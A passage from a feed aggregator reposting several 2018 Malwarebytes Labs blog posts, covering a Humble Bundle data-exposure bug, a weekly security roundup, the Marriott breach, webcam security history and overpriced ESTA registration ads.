I should explain at this point. You can buy standalone PC games on the Humble store, or whatever book, game, or other collection happen to be on offer this week. Alternatively, you can sign up to the monthly subscription. With this, you pay and then every month you’re given a random selection of video game titles. They may be good, bad, or indifferent. You might already own a few, in which case you may be able to gift them to others. If you have  no interest in the upfront preview titles, you can temporarily pause your subscription for a month.

This is the data that the bug exploiter has obtained, which is definitely an odd and specific thing to try and grab.

Security advice from Humble Bundle

Let’s go back to the email at this point:

Even though the information revealed is very limited, we take customer trust very seriously and wanted to promptly disclose this to you. We want to make sure you are able to protect yourself should someone use the information gathered to pose as Humble Bundle.

As a reminder, here are some tips to keep your account private and safe:

  • Don’t share your password, personal details, or payment information with anyone. We will NEVER ask for information like that.
  • Be careful of emails with links to unfamiliar sites. If you receive a suspicious email related to Humble Bundle, please contact us via our support website so that we can investigate further and warn others.
  • Enable Two-factor authentication (2FA) so that even if someone gets your password, they won’t be able to access your account. You can enable2FA by following these instructions.

We sincerely apologize for this mistake. We will work even harder to ensure your privacy and safety in the future.

Good advice, but what’s the threat?

One could guess that the big risk here, then, is the potential for spear phishing. They could exploit this by sending mails to subscribers that their subscription is about to time out, or claim problems with stored card details. Throw in a splash of colour text regarding your subscription “currently being paused,” and it’s all going to look convincing.

Phishing is a major danger online, and we should do everything we can to thwart it. While the information exposed here isn’t as bad as it tends to be, it can still cause major headaches. Be on the lookout for dubious Humble mails, especially if they mention subscriptions. It’ll help to keep your bundle of joy from becoming a bundle of misery.

The post Humble Bundle alerts customers to subscription reveal bug appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 26 – December 2)

Malwarebytes - Mon, 12/03/2018 - 17:06

Last week on Malwarebytes Labs, we took a look at our cybersecurity predictions for 2019, we explained why Malwarebytes participated in AV testing and how we took part in an joint take down of massive ad fraud botnets, warned that ESTA registration websites still lurk in paid ads on Google, discussed what 25 years of webcams have brought us, and reported about the Marriott breach that impacted 500 million customers.

Other cybersecurity news:
  • LinkedIn violated data protection by using 18 million email addresses of non-members to buy targeted ads on Facebook. (Source: TechCrunch)
  • Researchers created fake “master” fingerprints to unlock smartphones. (Source: Motherboard)
  • Uber slapped with £385K ICO fine for major breach. (Source: InfoSecurty Magazine)
  • Rogue developer infects widely-used NodeJS module to steal Bitcoins. (Source: The Hacker News)
  • When the FBI (and not the fraudsters) make a fake FedEx website. (Source: Graham Cluley)
  • Microsoft warns about two apps that installed root certificates then leaked the private keys. (Source: ZDNet)
  • Social media scraping app Predictim banned by Facebook and Twitter. (Source: NakedSecurity)
  • Tech support scam: Call centers shut down by Indian police in collaboration with Microsoft. (Source: TechSpot)
  • Germany detects new cyberattack targeting politicians, military, and embassies. (Source: DW)
  • It’s time to change your password again as Dell reveals attempted hack. (Source: Digital Trends)

Stay safe, everyone!

The post A week in security (November 26 – December 2) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Marriott breach impacts 500 million customers: here’s what to do about it

Malwarebytes - Fri, 11/30/2018 - 19:17

Today Marriott disclosed a large-scale data breach impacting up to 500 million customers who have stayed at a Starwood-branded hotel within the last four years. While details of the breach are still sparse, Marriott stated that there was unauthorized access to a database tied to customer reservations stretching from 2014 to September 10, 2018.

For a majority of impacted customers (approximately 327 million), the breached data includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some of those guests, their credit card numbers and expiration dates were exposed, however, they were encrypted using the Advanced Encryption Standard (AES-128).

You can read more on impact to customers in Marriott’s statement here.

A root cause of the breach is currently unknown, but Marriott indicated that the intruders encrypted the information before exfiltrating the data. Brian Krebs reported that Starwood reported its own breach in 2015, shortly after acquisition by Marriott. At the time, Starwood said that their breach timeline extended back one year, to roughly November 2014. Incomplete remediation of breaches is extremely common, and when compounded by asset management challenges introduced by mergers and acquisitions, seeing lateral movement and exfiltration after an initial hack is not unreasonable.

Starwood properties impacted are as follows:

  • Westin
  • Sheraton
  • The Luxury Collection
  • Four Points by Sheraton
  • W Hotels
  • St. Regis
  • Le Méridien
  • Aloft
  • Element
  • Tribute Portfolio
  • Design Hotels
What should you do about it? If you’re a customer:
  • Change your password for your Starwood Preferred Guest Rewards Program immediately. Random passwords generated by a password manager of your choice should be most helpful.
  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering. Review emails supposedly from Marriott with an eagle eye.
If you’re a business looking for tips to prevent getting hit by a breach:
  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Marriott breach impacts 500 million customers: here’s what to do about it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The 25th anniversary of the webcam: What did it bring us?

Malwarebytes - Fri, 11/30/2018 - 16:00

How did the webcam progress from a simple convenience to a worldwide security concern in 25 years?

November 2018 can be marked as the 25th anniversary of the webcam. This is a bit of an arbitrary choice, but if we consider a webcam that was installed at the University of Cambridge to keep an eye on the coffee level in the shared coffeemaker as the first one, then it’s been 25 years already. And those 25 years are measured from the moment the images were viewable over the Internet. (The images had been visible on the universities’ intranet since a few years before.)

Definition of a webcam

According to Wikipedia:

A webcam is a video camera that feeds or streams its image in real time to or through a computer to a computer network.

We deviate slightly from this definition by only considering cameras that are visible on the Internet.

The first official webcam

The first camera was actually installed in the late 1980’s so that employees could avoid walking all the way to the coffeemaker to find the pot empty, but it was made visible to the Internet in November 1993. Before that, it could only be seen on the local network. For none other than historic reasons, it is worth mentioning that this camera was in the “Trojan Room” of the Computer Science Department. The scientists used a digital camera with a video capture board and MSRPC2, a remote procedure call mechanism, to upload one frame per second.

The first commercial webcam

The first commercially produced webcam was the QuickCam by Connectix, which was marketed in 1994. It could only be used with an Apple Macintosh and recorded a whopping 15 frames per second. Nowadays, it’s hard to find a laptop that does not have a webcam installed. It has even reached the point where you can buy webcam covers to hide away from prying eyes.

Or use a Band-Aid

Popular usage

The webcam quickly became popular when Internet speeds rose to the level that it was possible to chat face-to-face over long distances. But there are many other legitimate and popular ways to use a webcam:

  • Child or pet monitoring: Keep an eye on your loved ones when you are elsewhere.
  • Video conferences: Join a meeting that you can’t physically attend.
  • Earth cam: Watch the scenery around the world from behind your laptop.
  • Security camera or baby monitor: Be alerted when something happens at home or in the baby’s room.
  • Porn: Sell your explicit images or video feed to earn some extra cash. (Not that we recommend it…)
  • Surveillance: Keep an eye on suspects. (this can also be combined with facial recognition.)
  • Vlogging: Share information about your life or interests online via video.
Possible future uses

Some webcam developments are underway, but not quite ready to hit the stores yet:

  • Face login: similar to using your fingerprints to log on to a device. Show your face to the webcam, and if it recognizes you, it will let you in. Same as with using fingerprint readers, I’d like the device to ask for my secret password now and then—just in case a thief looks a bit like me. Windows already has Hello Face Authentication, but it requires near infrared imaging.
  • VR-like webcams: adding an extra dimension to your webcam, 3D could make your online chats even more realistic. 3D webcams are already available, but the technology to use it in person-to-person chat isn’t available yet.
Internet of Things concerns

The Internet of Things (IoT) has been a subject of our cybersecurity related concerns before, and we don’t expect those concerns to go away anytime soon. Webcams are among the top IoT problems because of their sheer numbers and their often weak security setup, such as easy-to-guess and hard-to-change default passwords.

If you want to be freaked out a little, here are some of the websites that let you take a peek through the eye of unprotected webcams:


A botnet is a collection of centrally controlled devices and systems that accept commands from a remote administration. IoT devices, including webcams, are the stuff that the currently most powerful botnets are made of. The Mirai botnet, for example, has been responsible for some of the most effective DDoS attacks. Working for a central command has also made it possible for IoT botnets to be used in cryptomining.

Facial recognition

Facial recognition works by measuring distances between features on a face and comparing the resulting “faceprint” to a database. To get a dependable recognition rate, the tech must measure around 80 nodal points on the human face to create a faceprint and find a match.

Big Brother

The combination of publicly available security and surveillance cameras has brought Orwell’s vision of blanket surveillance to life. China is already using its massive network of closed-circuit television (CCTV) cameras and facial recognition technology to track its citizens. And if naming and shaming jaywalkers is the only activity they admit to, you can rest assured that it is far from the only thing that they are keeping track of.


Camfecting is a term used for hacking into a webcam’s data stream. Threat actors would be able to view or store the live feed from a webcam for their own purposes. An important thing to keep in mind is that if they have hacked your webcam, they are just as easily capable of turning off any warning light that would show you whether it’s active or not. The fear of camfecting is one reason for webcam covers (or post-it notes, Band-Aids, and other sticky stuff to cover the webcam’s eye). Stolen video images can lead to sextortion and other extortion practices.

Historic overview

Looking back, in 25 years we went from watching the level of supply in a coffeepot online to the state surveillance capabilities where we can be found and identified in a matter of minutes. And where we can’t be sure who is watching us or what the devices, we are using to look at others, are doing in the background. Are they sending the same images to the manufacturer? Or to some hacker? Should we be worried about those sextortion emails?  Probably not, but that still leaves us with lots of other things to worry about.

Different types

Webcams come in many different types, shapes, and sizes. While they perform many useful and convenient tasks, we need to be aware of the dangers and concerns that come with using them. The ones that we should be worried about most are the ones that are connected directly to the internet. The ones that are connected or even built into our computers and laptops are under control by the active security solutions. The IoT devices however, especially the ones that are fitted with no or default credentials, are a major concern in the fields of privacy and cybersecurity.

Use webcams to connect with friends and family, for meetings, and to keep an eye on your inventory, but don’t allow them to be the weak link in your home or business network.

The post The 25th anniversary of the webcam: What did it bring us? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ESTA registration websites still lurk in paid ads on Google

Malwarebytes - Wed, 11/28/2018 - 16:00

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa free for up to 90 days. This requires an application for eligibility on ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

Sure, everyone hates paperwork, but many people are needlessly paying for service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

How popular a Worldwide search term is “ESTA” over time?

Click to Enlarge

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!

Click to enlarge

Search term: ESTA questions

How popular a Worldwide search term is “ESTA questions” over time?

Click to enlarge

A search for “ESTA questions” returned one result, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.


Click to enlarge

The website featured in the advert doesn’t mention cost on the front page, but does on Terms of Use. Their basic fee is US$14 for the USGOV application, and US$85 for their listed services. This is arguably the kind of site Google is trying remove.

Search Term: ESTA answers

How popular a Worldwide search term is “ESTA answers” over time?

Click to Enlarge

“ESTA answers” returned four adverts.


Click to enlarge

First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported all sites to Google whose adverts potentially conflict with Google’s ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.


Click to enlarge

In terms of the sites themselves, we had a mixed response with regards to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No information visible for fees that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here’s the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.


Click to enlarge

Third result: No price visible that we could find.

Fourth result: US$79 plus US$14 Government fee

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”)

Seventh result: £37.82, US$14 Government fee, plus £1 “overseas transition/calling card fee”

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha”, they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds